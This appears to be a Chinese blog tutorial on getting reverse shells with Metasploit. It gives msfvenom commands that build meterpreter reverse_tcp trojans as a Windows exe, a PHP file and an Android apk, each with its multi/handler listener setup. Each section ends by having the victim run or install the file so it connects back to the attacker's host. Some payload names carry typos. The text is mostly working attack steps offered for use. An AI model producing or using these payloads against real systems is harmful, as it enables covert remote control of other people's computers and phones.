msf反弹shell

windows+exe反弹

  1. 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe

  1. 在攻击机的msf中启动监听模块设置payload。

use exploit/multi/handler:选择模块
show options:查看参数
set payload windwos/x64/meterpreter/reverse_tcp:选择payload(这里注意的需要和生成时的paylaod一样)
set LHOST:攻击机ip地址
set LPORT:监听的端口(和生成时一样)
exploit -j:后台执行监听run:执行监听

  1. 将之前生成的exe木马让到目标机器中让其运行。最后返回sessions。

php反弹

  1. 使用msfvenom模块生成php后门文件。

msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击机ip地址 LPORT=监听端口 -f raw > msf.php:生成php木马

  1. 在攻击机的msf中启动监听模块设置payload。

use exploit/multi/handler:设置攻击模块
set payload php/metrpreter/reverse_tcp:设置payload(需要和之前生成的payload一样)
show options:查看参数
set lhost :攻击机ip
set lport:设置监听端口(和生成时一样)
run:执行监听

  1. 将生成的msf.php木马上传到目标机器中运行,返回sessions。

安卓apk反弹

  1. 使用msfvenom模块生成apk后门文件。

msfvenom -p android/meterpreter/reverse_tcp lhost=攻击机ip地址 lport=监听端口 R > Desktop/123.apk

  1. 开metasploit控制台侦听。

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp:设置payload
set lhost 192.168.169.76 :攻击机ip地址
set lport 445 :对应刚才设的端口
exploit:监听

3.将生成的apk文件安装到安卓手机中打开即可,就会反弹shell回来。

以上只是最基本简单的反弹,后续还会继续更新……

发布了23 篇原创文章 · 获赞 30 · 访问量 7万+

猜你喜欢

转载自blog.csdn.net/cj_Allen/article/details/104134228